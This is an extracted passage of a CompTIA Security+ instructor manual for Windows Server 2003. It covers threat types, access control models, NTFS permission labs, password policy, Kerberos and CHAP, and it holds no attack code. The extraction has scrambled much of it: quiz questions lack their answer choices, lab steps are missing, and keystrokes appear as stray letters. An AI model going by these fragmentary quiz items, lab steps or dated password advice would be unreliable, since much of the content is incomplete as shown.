Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
ILT Series
COPYRIGHT Axzo Press. All rights reserved. No part of this work may be reproduced, transcribed, or used in any form or by any meansgraphic, electronic, or mechanical, including photocopying, recording, taping, Web distribution, or information storage and retrieval systemswithout the prior written permission of the publisher. For more information, go to www.courseilt.com.
Trademarks
ILT Series is a trademark of Axzo Press. Some of the product names and company names used in this book have been used for identification purposes only and may be trademarks or registered trademarks of their respective manufacturers and sellers.
Disclaimer
We reserve the right to revise this publication and make changes from time to time in its content without notice.
Contents
Introduction
Topic A: Topic B: Topic C: Topic D:
About the manual............................................................................... vi Setting student expectations .............................................................. xi Classroom setup................................................................................ xix Support.............................................................................................xxvii
Security overview
1-1
Topic A: Introduction to network security....................................................... 1-2 Topic B: Understanding security threats ......................................................... 1-5 Topic C: Creating a secure network strategy................................................... 1-9 Topic D: Windows Server 2003 server access control ................................... 1-13 Unit summary: Security overview................................................................... 1-24
Authentication
2-1
Topic A: Introduction to authentication........................................................... 2-2 Topic B: Kerberos............................................................................................ 2-8 Topic C: Challenge Handshake Authentication Protocol ............................... 2-14 Topic D: Digital certificates............................................................................ 2-16 Topic E: Security tokens ................................................................................ 2-19 Topic F: Biometrics........................................................................................ 2-22 Unit summary: Authentication ........................................................................ 2-30
3-1
Topic A: Denial of service attacks................................................................... 3-2 Topic B: Man-in-the-middle attacks............................................................... 3-15 Topic C: Spoofing........................................................................................... 3-18 Topic D: Replays ............................................................................................ 3-25 Topic E: TCP session hijacking...................................................................... 3-27 Topic F: Social engineering ........................................................................... 3-29 Topic G: Attacks against encrypted data ........................................................ 3-32 Topic H: Software exploitation....................................................................... 3-37 Unit summary: Attacks and malicious code.................................................... 3-51
Remote access
4-1
Topic A: Securing remote communications..................................................... 4-2 Topic B: Authentication .................................................................................. 4-5 Topic C: Virtual private networks .................................................................. 4-16 Topic D: Telecommuting vulnerabilities ........................................................ 4-27 Unit summary: Remote access ........................................................................ 4-31
5-1
Topic A: Secure e-mail and encryption ........................................................... 5-2 Topic B: PGP and S/MIME encryption.......................................................... 5-13 Topic C: E-mail vulnerabilities....................................................................... 5-24 Unit summary: E-mail ..................................................................................... 5-30
Web security
6-1
ii
CompTIA Security+ Certification Topic B: Vulnerabilities of Web tools ........................................................... 6-15 Topic C: Configuring Internet Explorer security ........................................... 6-30 Unit summary: Web security .......................................................................... 6-40
7-1
Topic A: Introduction to directory services..................................................... 7-2 Topic B: File transfer services........................................................................ 7-10 Topic C: File sharing...................................................................................... 7-25 Unit summary: Directory and file transfer services ........................................ 7-28
8-1
Topic A: IEEE 802.11 ..................................................................................... 8-2 Topic B: WAP 1.x and WAP 2.0 ................................................................... 8-10 Topic C: Wired equivalent privacy ................................................................ 8-23 Topic D: Instant messaging ............................................................................ 8-36 Unit summary: Wireless and instant messaging ............................................. 8-42
Network devices
9-1
Topic A: Understanding firewalls ................................................................... 9-2 Topic B: Routers ............................................................................................. 9-9 Topic C: Switches .......................................................................................... 9-16 Topic D: Telecom, cable modem, and wireless devices................................. 9-19 Topic E: Securing remote access ................................................................... 9-23 Topic F: Intrusion detection systems ............................................................. 9-26 Topic G: Network monitoring ........................................................................ 9-29 Unit summary: Network devices .................................................................... 9-36
10-1
Topic A: Transmission media......................................................................... 10-2 Topic B: Storage media................................................................................. 10-11 Unit summary: Transmission and storage media........................................... 10-19
11-1
Topic A: Security topologies.......................................................................... 11-2 Topic B: Network Address Translation.......................................................... 11-7 Topic C: Tunneling ....................................................................................... 11-21 Topic D: Virtual Local Area Networks ......................................................... 11-23 Unit summary: Network security topologies ................................................. 11-29
Intrusion detection
12-1
Topic A: Intrusion detection systems ............................................................. 12-2 Topic B: Network-based and host-based IDS ................................................ 12-5 Topic C: Active and passive detection .......................................................... 12-14 Topic D: Honeypots ...................................................................................... 12-20 Topic E: Incident response............................................................................ 12-25 Unit summary: Intrusion detection ................................................................ 12-28
Security baselines
13-1
Topic A: OS/NOS hardening.......................................................................... 13-2 Topic B: Network hardening......................................................................... 13-14 Topic C: Application hardening .................................................................... 13-23 Topic D: Workstations and servers ............................................................... 13-43 Unit summary: Security baselines ................................................................. 13-55
Physical security
15-1
Topic A: Access control.................................................................................. 15-2 Topic B: Environment ................................................................................... 15-12 Unit summary: Physical security.................................................................... 15-18
16-1
Topic A: Disaster recovery ............................................................................. 16-2 Topic B: Business continuity......................................................................... 16-11 Topic C: Policies and procedures .................................................................. 16-14 Topic D: Privilege management .................................................................... 16-24 Unit summary: Disaster recovery and business continuity ............................ 16-28
17-1
Topic A: Understanding computer forensics .................................................. 17-2 Topic B: Risk identification............................................................................ 17-9 Topic C: Education and training.................................................................... 17-11 Topic D: Auditing .......................................................................................... 17-14 Topic E: Documentation................................................................................ 17-17 Unit summary: Computer forensics and advanced topics .............................. 17-21
A-1 S-1
Topic A: Comprehensive exam objectives ......................................................A-2 Topic A: Course summary ............................................................................... S-2 Topic B: Continued learning after class .......................................................... S-7
Glossary Index
G-1 I-1
xxviii
11
ramifications.
C Determine the factors involved in creating
server.
12
Security overview Today, companies are achieving a balance by keeping the bad guys out with increasingly complex ways of letting the good guys in. Managing risk
13
Security is critical for all types of Internet businesses, by protecting high-availability systems from intrusion and corruption, security technologies help companies build trust with their employees, suppliers, partners, and customersa trust that information is protected and transactions are reliable. When most people talk about security, they mean ensuring that users: 1 Can perform only tasks they are authorized to do 2 Can obtain only information they are authorized to have 3 Cannot cause damage to the data, applications, or operating environment of a system The word security connotes protection against malicious attack by outsiders; security also involves controlling the effects of errors and equipment failures. Anything that can protect against an attack can prevent random misfortune as well.
14
Do it!
A-1:
3 Integrity is maintained when the message sent is identical to the message received. True or false?
True
4 Confidentiality is the protection of data from authorized disclosure to a third party. True or false?
False: It is the protection of data from unauthorized disclosure to a third party.
Security overview
15
Sources of threats
There are four primary causes for compromised security: Technology weaknesses Configuration weaknesses Policy weaknesses Human error or malice
16
CompTIA Security+ Certification Technology weaknesses Computer and network technologies have intrinsic security weaknesses in the following areas: TCP/IP A communication protocol suite for routed networks, TCP/IP was designed as an open standard to facilitate communications. Due to its wide usage, there are plenty of experts and expert tools that can compromise this open technology. It cannot guard a network against message-modification attacks or protect connections against unauthorized-access attacks. Operating systems Such as UNIX, Linux, Windows NT and 95, and OS/2 need the latest patches, updates, and upgrades applied to protect users. Network equipment Routers, firewalls, and switches must be protected through the use of password protection, authentication, routing protocols, and firewalls. Configuration weaknesses Even the most secure technology can be misconfigured. Security problems are often caused by one of the following configuration weaknesses: Unsecured accounts User account information might be transmitted unsecurely across the network, exposing usernames and passwords to sniffers, which are programs for monitoring network activity, capable of capturing and analyzing IP packets on an Ethernet network or dial-up connection. System accounts with easily guessed passwords Poorly administered password policies can cause problems in this area. Misconfigured Internet services A common problem is to turn on Java and JavaScript in Web browsers, enabling attacks via hostile Java applets. Another problem is putting high-security data on a Web server; this type of data (social security numbers, credit card numbers) should be behind a firewall and require user authentication and authorization to access. Unsecured default settings Many products have default settings that enable security holes (for example, UNIX sendmail and X Windows). Misconfigured network equipment Misconfiguration of network devices can cause significant security problems. For example, misconfigured access lists, routing protocols, or Simple Network Management Protocol (SNMP) community strings can open up large security holes. Trojan horse programs Delivery vehicles for destructive code, these appear to be harmless programs but are enemies in disguise. They can delete data, mail copies of themselves to e-mail address lists, and open up other computers for attack. Vandals These software applications or applets can destroy a single file or a major portion of a computer system. Viruses These are the largest threat to network security and have proliferated in the past few years. They are designed to replicate themselves and infect computers when triggered by a specific event. The effect of some viruses is minimal and only an inconvenience, while others are more destructive and cause major problems, such as deleting files or slowing down entire systems.
Security overview Human error and malice Human error and malice constitute a significant percentage of breaches in network security. Even well trained and conscientious users can cause great harm to security systems, often without knowing it. Well-intentioned users can contribute to security breaches in several ways:
17
Accident The mistaken destruction, modification, disclosure, or incorrect classification of information. Ignorance Inadequate security awareness, lack of security guidelines, lack of proper documentation, lack of knowledge. Users might inadvertently give information on security weaknesses to attackers. Workload Too many or too few system administrators. Conversely, ill-willed employees or professional hackers and criminals can access valuable assets through deceit: Dishonesty Fraud, theft, embezzlement, and the selling of confidential corporate information. Impersonation Attackers might use the telephone to impersonate employees to persuade users or administrators to give out usernames, passwords, modem numbers, and so on. Disgruntled employees Those who have been fired, laid off, or reprimanded might infect the network with a virus or delete files. Usually one of the largest security threats, these people know the network and the value of the information on it. Snoops Individuals who take part in corporate espionage by gaining unauthorized access to confidential data and providing this information to competitors. Denial-of-service attacks These attacks engulf network equipment with useless noise, thereby causing systems to slow down or even crash.
18
Do it!
B-1:
2 What is a crime called in which one person masquerades under the identity of another?
A
B C D
B C D E
4 Trojan horses are destructive programs that masquerade as benign applications. True or false?
True
Unsecured accounts Misconfigured Internet services Misconfigured access lists Human ignorance
Security overview
19
110
CompTIA Security+ Certification Knowing your weaknesses Every security system has vulnerabilities. Attack your own system to determine where your weaknesses are located. Once you identify your weaknesses, you can plug those holes effectively. Determine the areas that present the largest danger to your system and prevent access to them immediately. Add more security to these areas. Is your weakness an internal server, a firewall, a router, or improperly trained staff ? Develop a methodology for testing and ensuring your systems remain safe. Limiting access The security of a system is only as good as the weakest security level of any single host in the system. Not everyone needs to have authorization to every folder or document. Segment your network users, files, and servers. For example, staff members in the Accounting Department do not need access to personnel files in the Human Resource Department. The default access should be no access. From there, you open holes with permissions and authentication allowing authorized users to access resources. If you start from this premise, its easier than starting from open access. Achieving security through consistency Develop a change management process around your network. Whenever there are network upgrades, whether patches, the addition of new users, or updating a firewall, you should document the process and procedures. If you are thorough in documenting the process, you limit your security risks. When you add new users to the network, do you always do the same thing? What if you forget a step? Is your security breached? Be methodical and follow a written process. Physical security It makes no sense to install complicated software security measures when access to the hardware is not controlled. Require authorization into your network room and the different closets in which network equipment is kept; otherwise, unauthorized users can easily access and destroy network equipment in seconds. Perimeter security Perimeter security is controlling access to critical network applications, data, and services. The services offered include secure Web and file servers, gateways, remote access, and naming services. Each organization should be prepared to select perimeter security tools based on their network requirements and budget. Along with the network, for successful perimeter security, blueprints for all campus grounds and buildings are necessary. In addition, all hardware, PCs, and software components must be documented. Firewalls A firewall is a hardware or software solution that contains programs designed to enforce an organizations security policies by restricting access to specific network resources. The firewall creates a protective layer between the network and the outside world. The firewall has built-in filters that can be configured to deny unauthorized or dangerous materials from entering the network. Firewalls log attempted intrusions and create reports.
111
Organizations must test mission-critical hosts, workstations, and servers for vulnerabilities. Determine if your organization has the in-house expertise and experience to successfully test the network. If not, outsourcing to a reputable security assessment organization is recommended. Access control Access control ensures that legitimate traffic is allowed into or out of your network. This is done by having users identify themselves via passwords to prove their identity at login. In addition, access must be permitted or denied for each application, function, and file. Most attacks against networks are instances when unauthorized people find a way through the login system. This type of attack happens by guessing or stealing a user identity that is recognized by the system. These attacks are successful because existing networks utilize access control systems, which merely involve entering a user identity together with a password. With this limited security, attacks are simple and common. Many systems do not log invalid password entries into their systems, allowing an attacker to be more persistent. Hackers can continue trying different passwords repeatedly without being noticed. Another type of access control is personal identification numbers (PINs). These are commonly used at banks. The only difference between passwords and PINs is that PINs are usually all numeric and only a few characters long. Security tokens are gaining popularity as well. This hardware plugs into computing devices and dynamically generates a new password at each login. This is done automatically for the user once the user authenticates with a password. Smartcards, with embedded chips, contain code that identifies its holder, or contain keys that can read and send encrypted data. These cards are becoming more popular and are very useful for maintaining security. Change management Change management is a set of procedures developed by network staff that are followed whenever a change is made to the network. Most organizations focus on servers and do not document changes to the backbone, which touches the entire network infrastructure. It is important to document changes to all areas of your IT infrastructure. Encryption Encryption ensures messages cannot be intercepted or read by anyone other than their intended audience. Encryption is usually implemented to protect data that is transported over the public network; it uses advanced algorithms to scramble messages and their attachments. Intrusion detection systems An intrusion detection system (IDS) provides 24/7 network surveillance. It analyzes packet data streams within the network and searches for unauthorized activity. When unauthorized activity is detected, the IDS can send alarms to a management console with details of the activity and can order other systems to cut off the unauthorized session.
112
Do it!
C-1:
Knowing your weaknesses Determining the cost Remembering human factors Controlling secrets All of the above
Restricts access to specific network resources Contains built-in filters Creates a protective layer between the network and the outside world Is a hardware only solution
Security overview
113
114
CompTIA Security+ Certification DAC Discretionary access control (DAC) allows an owner of a file to dictate who can access the file and to what extent. The owner of the resource creates an access control list (ACL) to list the users with access and the type of access (permissions). Most operating systems provide some form of the read, write, execute, modify, and delete permissions. One of the drawbacks to this method is that each owner controls the access levels to his or her personal files. With inappropriate access control, confidential information can be accidentally or deliberately compromised, or resources can be rendered inaccessible. The assumption is that the owner of the file has the expertise to manage the access levels appropriately. RBAC Role-based access control (RBAC), not to be confused with rule-based access control, is based on the role a user plays in the organization. Instead of giving access to individual users, access control is granted to groups of users who perform a common function. This allows for centralized administration, where access to resources is defined based on roles, and each user is assigned one or more roles. This is considered a nondiscretionary access control.
115
D-1:
Heres how
Tell students this activity will show them how to determine whether a file partition is FAT or NTFS, as well as how to convert a FAT partition to NTFS.
1 Log on to the Windows Server 2003 server as Administrator 2 Click Start Choose Run Type cmd Press e
To access the command window. To determine whether a file partition is FAT or NTFS. You will see the message, The type of the file system is FAT 32. E: is not dirty. This indicates that NTFS was not yet installed and there is no corruption on the drive.
The FAT partition in this lab will be designated as drive letter E. However, if you have more drives installed, this might be a higher letter than E:. Be sure students do not change drive C:.
5 If the drive has a volume label, enter it when prompted 6 At the command line, enter
chkntfs e:
7 Enter exit
116
Data confidentiality
Explanation After a secure file system is installed, you can begin to think about data confidentiality. Data confidentiality refers to making sure only those intended to have access to certain data actually have that access. With the FAT file system, this is not possible at the local level, but with NTFS, you can lock down both folders and files locally. NTFS can be used to protect data from intruders who might have physical access to the computer containing the data. Exhibit 1-1 shows the default NTFS permissions.
Exhibit 1-1: Default NTFS permissions on a Windows Server 2003 server Do it!
D-2:
Heres how
In this activity, students will create a folder and files, assign NTFS permissions, and then verify whether the data is confidential.
2 Create a new folder called Confidentiality 3 Double-click the Confidentiality folder 4 Create a new folder called User1Folder 5 Right-click User1Folder Choose Properties 6 Activate the Security tab
The User1Folder Properties screen appears. The Security tab is displayed, as shown in Exhibit 1-1.
117
To retain the permissions. To return to the Security tab. To start the process of adding access permissions for User1. The Select Users or Groups window appears.
Click OK twice 14 With User1 still highlighted, select Allow for Full Control
15 Select each group in the list of Group or user names and Click Remove for each group Click OK 16 Double-click User1Folder 17 Close all windows and log off
To remove the Administrators, Creator Owner, System and Users groups from the access control list. Do not remove User1. To save the changes. You are denied access because you granted access to the folder only to User1.
18 Log on as User1 and navigate to the User1Folder 19 Close all windows and log off
To verify that User1 has access to the folder. You should be able to open the folder.
118
Data availability
Explanation Although it is important that data remains secure and confidential, it is just as important that the data is available when needed. Secured data that is inaccessible results in downtime and is detrimental to a business and its ability to serve customers. Technologies such as clustering and load balancing can help, but if NTFS permissions are assigned inappropriately, these features will not remedy the situation.
Do it!
D-3:
Heres how
In this activity, students will examine how NTFS permissions affect a users access to resources.
1 Log on to the Windows Server 2003 server as Administrator 2 Open My Computer Double-click the E: drive 3 Create a new folder called Availability 4 Double-click the Availability folder 5 Create a folder called User2Folder 6 Right-click User2Folder Choose Properties 7 Activate the Security tab 8 Click Advanced 9 Clear Allow inheritable
permissions from parent to propagate to this object and all child objects. Include these with entries explicitly defined here. Youll be prompted to Copy, Remove, or Cancel. To open the User2Folder Properties window.
To clear the permissions. To return to the Security tab. To acknowledge the Security message and continue. To open the Select Users or Groups window.
Security overview 15 Click Find Now Select User2 Click OK twice 16 With User2 still highlighted, select Allow for Full Control Click OK 17 Close all windows and log off
Point out to students that User2 does not require a password to log on.
119
You might have to scroll to see the user. To add User2 to the access control list. To assign User2s permissions.
18 Log on as User2 19 Verify that you have access to e:\Availability\User2Folder 20 Close all windows and log off 21 Log on as Administrator 22 Delete the User2 account from the local security database 23 Create a new user, also named User2
Click Start, right-click My Computer and choose Manage. Expand Local Users and Groups. Select Users and delete User2. With Users selected, choose Action, New User. Enter User2 as the User name, clear User must change password at next logon and click Create. Click Close.
Notice that the User2 account is no longer listed, but the accounts SID is.
25 Logon as User2 and try to access the e:\Availability\ User2Folder 26 Close all windows and log off
120
Data integrity
Explanation After data is secured properly and available to the appropriate people, it is important to make sure the contents of the data have not been altered accidentally or intentionally. Malicious corruption is a problem, and can be done by a virus, worm, or hacker. Accidental changes, however, can also damage data integrity. For example, Windows Server 2003 file synchronization capabilities could easily lead to accidental corruption. Changes made to data that conflict with other changes to the same data could damage data integrity just as much as a hacker can. Environmental problems can lead to data integrity issues, such problems include; dust, surges, and excessive heat. Windows Server 2003 default permissions are configured in such a way that only the creator of a file and users who belong to the System Administrators group can change a file by default. Members of the Users group can view a file by default, but cannot make changes. To enable others to change a file, permissions have to be specifically assigned.
121
D-4:
Heres how
1 Log on to the Windows Server 2003 server as User1 2 In My Computer, display the E: drive 3 Create a new folder called Integrity 4 Within the Integrity folder, create a new folder called User1Folder 5 Within User1Folder, create a new text document 6 Type This document has not
been modified accidentally or intentionally.
8 Close the document 9 Log off User1 10 Log on as User2 11 Navigate to e:\Integrity\User1Folder 12 From the New Text Document, remove the word not 13 Try to save the file to save the changes 14 Close all windows and log off User2
You did change the default permissions to e:\Integrity\User1Folder, so you can still view the contents of the file as User2. You receive an error message that you can't save the file. The data integrity of the file is maintained.
122
Data encryption
Explanation With NTFS, you are not limited to folder- and file-level security. Another function of NTFS is the ability to encrypt data. Encryption is the process of taking readable data and making it unreadable. Encryption is commonly used for remote data transfer, but it can also be used for local security. Laptop users might want to use NTFS to secure and encrypt their data in the event the laptop is stolen. While this solution is not 100% effective, it does make it more difficult to hack into your system. Windows Server 2003 offers a very easy way to encrypt files on an NTFS partition.
Do it!
D-5:
Heres how
This activity demonstrates how to encrypt data within a file.
1 Log on to the Windows Server 2003 server as User2 2 In My Computer, open the E: drive 3 Create a new folder called Encryption 4 Within the Encryption folder, create a new folder called User2Folder 5 Within User2Folder, create a new text document Edit the content to read
This document is for my eyes only.
123
10 Select the Encrypt the file only radio button Click OK 11 Log off as User2 12 Log on as User1 13 Try to access the Private Document file in e:\Encryption\User2Folder 14 Logoff User 1
Access should be denied. You'll also notice the file name displays in green to indicate it's been encrypted.
124
Topic B
Topic C
Topic D
Review questions
1 What file systems are compatible with Windows NT 4.0?
A
FAT
B FAT32 C OSPF
D
NTFS
2 Which of the following commands will convert a FAT partition to NTFS? A update C: /FS:NTFS B upgrade C: /FS:NTFS
C
convert C: /FS:NTFS
D convert C: /NTFS
Security overview 3 Which of the following is the best definition of data confidentiality? A Data that has not been tampered with intentionally or accidentally B Data that has been scrambled for remote transmission
C
125
D Data that can be accessed when it is needed 4 Which of the following is the best definition of data availability? A Data that has not been tampered with intentionally or accidentally B Data that has been scrambled for remote transmission C Data that is secured so only the intended people have access
D
5 How can data confidentiality affect data availability? A They are two independent areas and do not affect each other B For data to be available, it cannot be confidential
C
Data that is secured too strongly might conflict with the availability
D Data that is secured too weakly might conflict with the availability 6 Which of the following is the best definition of data integrity?
A
B Data that has been scrambled for remote transmission C Data that is secured so only the intended people have access D Data that can be accessed when it is needed 7 Which of the following can damage data integrity? (Choose all that apply.)
A B C D
126
CompTIA Security+ Certification 8 Data Integrity can also be threatened by environmental hazards such as dust, surges, and excessive heat. True or false?
True
9 Which of the following is the best definition of encryption? A Data that has not been tampered with intentionally or accidentally
B
C Data that is secured so only the intended people have access D Data that can be accessed when it is needed
21
Unit 2 Authentication
Unit time: 120 minutes Complete this unit, and youll know how to:
A Create strong passwords and store them
securely.
B Discuss the Kerberos authentication
process.
C Explain how CHAP works. D Explain how digital certificates are created
function.
F Explain the biometric authentication
processes.
22
Authentication
Explanation Security of system resources generally follows a three-step process of authentication, authorization, and accounting (AAA). This AAA model begins with positive identification of the person or system seeking access to secured information or services (authentication). That person is granted a predetermined level of access to the resources (authorization), and the use of each asset is then logged (accounting). The most critical step in the process is authentication. Without a positive identification, other steps are worthless, because they cannot distinguish between the authorized user and an imposter. The amount of security implemented in the authentication process should be proportional to the value of the resources being protected. As our dependence on computer network systems has increased, so has our willingness to pay for stronger authentication technologies to secure against attack.
Authentication
23
With increasing numbers of sites requiring authorization, users often choose to reuse the same simplistic password on multiple sites, aggravating the vulnerabilities of the authentication keys of which such passwords are a part. Password protection guidelines The proliferation of computing has led to the use of weak personal password techniques. These weak techniques are the crux of the problem with passwords. We are now operating in a digital environment in which the bad guys are using faster and more capable computers and applications to violate our computer systems, because of this, we need to more carefully construct, use, and store our passwords. There are many different password conventions, but, there are five basic rules to follow in order to safeguard your passwords: Passwords must be memorized. If they must be written down, the written records must be locked up. For multiple applications, each password you choose must be different from any other you use.
Some operating systems such as NetWare do not recognize the difference between upper and lower case letters.
Passwords must be at least six characters long, and preferably longer, depending on the size of the character set used. Passwords must contain a mixture of letters (both uppercase and lowercase) if the operating system supports case-sensitive passwords, numbers, and other characters, such as %, !, or &. Passwords must be changed periodically. Strong password creation techniques It is important to choose passwords that are easy to remember but difficult to recognize. One way to do this is to think of a simple phrase or words to a song that can be easily remembered, such as, April showers bring Might flowers. Use the first letters of each word and add a number and a punctuation mark or another character, which might give youAsb4Mf? Another technique is to combine two dissimilar words and place a number between them, such as SleigH9ShoE. One can also substitute numbers for letters, but this should be done carefully. Replacing the words to and for with their numeric synonyms, 2 and 4 is a fairly obvious ploy to most hackers. An all too frequent example of this simple substitution process is pa55w0rd. A five is just a reformatted S, and zero could easily be the letter O. Most password cracking utilities check for these types of well-known substitutions. The key is that your password means something to you and that it creates a strong password, one that cannot be easily guessed or quickly discovered using a brute force attack (the process of systematically trying every single possible combination of characters until the correct combination is determined). Techniques to use multiple passwords People often have access to many different systems, each requiring a username/password set. It is recommended that you use a different password every time one is required, but you can also group different Web sites or applications by their appropriate level of security and use a different password for each of those groups while taking care to actually use a different password for each of the more critical Web sites (for example., those of financial institutions) and applications (for example, financial software).
Have each student devise a strong password and write it down on a piece of paper along with their name. Collect the papers and after several more minutes of discussion, have each student recall their password. You be the judge as to whether the password qualifies as strong.
24
CompTIA Security+ Certification For example, one lower-level group might make up the various news and weatherrelated Web sites you visit. If someone were to obtain your password to these sites, it would do you no real harm. Another method is to cycle your more complex passwords down the groups, from most sensitive to least. This allows you to reduce the total number of passwords that you are using while giving you time to work with a given password (and remember it) before relegating it for use in the more insecure password entry fields that you might encounter. You might also try using a common password base, but change parts of the password depending on where you are required to use it. For example, you could take the password ToRn71@L (sort of like torrential) and depending on the Web site change the T, R, and L to NoYn71@T for the New York Times Web site and SoAn71@N for the SANS Institute Web site. Storing passwords If you must write a list of your various passwords down on paper, keep the piece of paper close to you in an item that you are not likely to lose sight of, such as a purse or wallet. These passwords should be written in very small type to minimize someone else reading the information. Another good practice is to develop a personal code to apply to your password list. For instance, the first three characters of each password might be transposed and moved to the end of the password string, and the hostname might be moved down one place in the list, lining it up with a password for a different server. The individual who owns this written password card would have no problem quickly decoding the information to enter, but it adds a small delay for anyone who would maliciously use the information. If you keep this list electronically, encrypt the password list with Windows 2000/Server 2003/XP encryption or some application that is specifically designed for this purpose. Password protect the encrypted file with a strong password (different from your login password) and never electronically store the password that gains access to the file.
Authentication
25
Specifying a minimum length for passwords. Short passwords or blank passwords are easy to crack. Setting the password complexity to require use of at least three of the following: one number, one uppercase letter, one lowercase letter, or one symbol. Combining password length with complexity is a recommended method of security professionals. Implementing an account lockout policy. The account lockout policy will disable an account for a specific amount of time after a certain number of failed logon attempts. To prevent display of the last logon name in Windows Server 2003, modify the local security policy and change the Interactive logon: Do not display last user name option to Enabled. Do it!
A-1:
Heres how
1 Log on to the Windows Server 2003 server as Administrator 2 Click Start Choose Administrative
Tools, Local Security Policy
6 Select Enabled Click OK 7 Close all windows and log off 8 Press c + a + d
Notice the User name field is empty in the logon screen.
26
Do it!
A-2:
Using the Windows Server 2003 local password policy settings for length Heres why
Heres how
1 Log on to the Windows Server 2003 server as Administrator 2 Click Start Choose Administrative
Tools, Local Security Policy
Change the characters value to 9 6 Click OK 7 Close all windows and log off 8 Log on as User1 9 Press c + a + d
Tell students this step is not meant to be successful.
10 Click Change Password In both the New Password and Confirm New Password text boxes, type a new password of less than 9 characters Click OK
A message stating your password must be at least 9 characters long cannot repeat any of your previous 0 passwords and must be at least 0 days old appears. To change the password.
Authentication
27
Password complexity
Explanation Finally, to set the password complexity in Windows Server 2003, modify the local security policy and change the Passwords must meet complexity requirements option.
Do it!
A-3:
Using the Windows Server 2003 local password policy settings for complexity Heres why
Heres how
1 Log on to the Windows Server 2003 server as Administrator 2 Click Start Choose Administrative
Tools, Local Security Policy
3 Expand Account Policies 4 Select Password Policy 5 Double-click Password must meet complexity requirements Select Enabled 6 Click OK 7 Close all windows and log off 8 Log on as User1 9 Press c + a + d 10 Click Change Password
In the Old Password box, type password1 In the New Password box and Confirm New Password box, type password321
Review the entire message with your students.
A message box appears, indicating restrictions and steps for completing the password change. The password change is successful. Changing the p in password to a capital P caused the password to meet the password complexity requirements.
28
Topic B: Kerberos
This topic covers the following CompTIA Security+ exam objective:
# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Kerberos Mutual
Introducing Kerberos
Explanation In 1983, researchers at the Massachusetts Institute of Technology (MIT) started a fiveyear project to incorporate computers into the MIT curriculum. As part of the project, a leading edge network authentication protocol was developed. It was named Kerberos, after the three-headed dog that guarded the entrance to Hades in Greek mythology. In 1989, version 4 was publicly released in open source code. Although Kerberos 4 is still in use in a few environments, Kerberos 5 is the standard today. As of this writing, the latest version is Kerberos 5-1.4.2. Kerberos is freely available to anyone in the U.S. and Canada from the following Web page:
itinfo.mit.edu/product.php?name=Kerberos
Point out that Kerberos 5 is the current standard today. Point to the Web site where Kerberos security is freely available.
Kerberos provides a means to authenticate users and services over an open multiplatform network using a single login procedure. After the user is authenticated by the system, all subsequent commands and transactions can be carried out securely without any prompting for a password.
Authentication
29
Terminology
The Kerberos system consists of the following components: Principal Any uniquely-named client or server to which Kerberos can assign tickets. Authentication Server (AS) A network service that authenticates users or services, then supplies ticket-granting tickets to the authorized user or service. Ticket-Granting Server (TGS) A network service that supplies temporary session keys and tickets to authorized users or services. Key Distribution Center (KDC) A server running both AS and TGS services: services both initial ticket and ticket-granting ticket requests. Realm An organizational boundary that is formed to provide authentication boundaries. Each realm has an Authentication Server and a Ticket-Granting Server. Remote Ticket-Granting Server (RTGS) A remote realms TGS. The following terms describe types of data that are passed over the network during Kerberos processing: Credentials A ticket for the resource server plus a temporary encryption key (session key). Session key A temporary encryption key used between the client and resource server, with a lifetime limited to the duration of a single login session. Authenticator A record containing information that can be shown to have been recently generated using the session key known only by the client and server. The authenticator is typically valid for five minutes and cannot be reused. Ticket A record that helps a client authenticate itself to a server; it contains the clients identity, a session key, a timestamp, and checksum, all sealed using the resource servers secret key. Ticket-Granting Ticket (TGT) A ticket that is granted as part of the Kerberos authentication process and used to obtain other tickets from the TGS.
210
How it works
Kerberos uses encryption technologies to pass a users credentials over unsecured channels and validate the user for network resources. The process, pictured in Exhibit 21, is as follows: 1 When Maria logs on to her workstation with her username and password, the workstation automatically sends a request to the Authenticating Server (AS) for a Ticket-Granting Ticket (TGT). The AS has a database listing the valid users and servers within the scope of its authority (realm) and their master keys. 2 The AS receives the request for a TGT, authenticates Maria, uses her master key to encrypt a new TGT, and sends it back to Marias workstation. Now that she has a TGT, she does not have to keep authenticating herself to gain access to additional services, at least until the TGT expires. (The TGT is valid for the duration of the logon session, as configured in the account security policy, or until the user disconnects or logs off.) 3 Whenever Maria needs a new service, her workstation sends a copy of the TGT, along with the name of the server that holds the application she needs, an authenticator, and the time period that she needs access to each service, to the ticketgranting server (TGS) requesting a ticket for each of the services she needs. 4 Once the TGS has verified that Maria is in fact who she says she is, using the session key to access her authenticator, and assuming the TGT matches her to her authenticator, the TGS sends her tickets to use the services she needs. 5 After receiving the appropriate tickets from the TGS, Marias workstation verifies that each one is for a service that she originally requested, and sends a ticket to each relevant server requesting permission to use their services. 6 Each of the servers that receive a request for service verifies that the request came from the same person, or machine, to which the TGS granted the ticket. As each server determines that Maria has the authority to use the service requested it authorizes her to begin using those services. The TGT must be submitted each time Maria needs additional services. Each time the validity period for using previously requested service expires, an entirely new TGT must be obtained.
Authenticating Server 1 2
3 4
Client 5 6
Ticket-Granting Server
Resource Server
Authentication
211
Authenticating Server 1 2
3 4
Client 5 6
RTGS
Cross-Realm Server
Exhibit 2-2: Cross-realm authentication For more information about Kerberos, including initial, preauthentication, invalid, renewable, postdated, proxiable, and forwardable tickets, see RFC 1510. RFCs can be found at the following Web page:
http://www.faqs.org/rfcs/rfc-index.html
212
Mutual authentication
Mutual authentication is the process by which each party in an electronic communication verifies the identity of the other. For instance, a bank clearly has an interest in positively identifying an account holder prior to allowing a transfer of funds; however, you as a bank customer also have a financial interest in knowing your communication is with the banks server prior to providing your personal information. Kerberos allows a service to authenticate a recipient so that access to the service is protected. Conversely, it allows the recipient to authenticate the service provider so rogue services are blocked.
Authentication Do it!
213
B-1:
Discussing Kerberos
3 In very large organizations, Kerberos employs multiple authentication servers, each of which is responsible for a subset of users and servers in the network system. True or false?
True
Once the user has been authenticated, the AS sends the user a ticket-granting ticket (TGT). Once the client has received a TGT, the client presents it to the TGS in order to receive a session key for each requested service. Once the client receives the appropriate ticket from the TGS, the client submits a request to the authentication server.
Eight hours One hour Twenty minutes Five minutes Two minutes
214
Introducing CHAP
Explanation The Challenge Handshake Authentication Protocol (CHAP) is an authentication scheme used by Point-to-Point Protocol (PPP) servers to validate the identity of the remote client at the beginning of the communication session or any time throughout the session.
Authenticating Server
Peer
Authentication
215
CHAP protects against playback attacks by changing the content of the challenge message with each authentication request. The challenge can be repeated at unpredictable intervals while the connection is open, limiting the time of exposure to any single attack, and the server is in control of the frequency and timing of the challenges. For further information on CHAP, see the following Web page:
http://www.ietf.org/rfc/rfc1994.txt
Do it!
C-1:
2 1 3
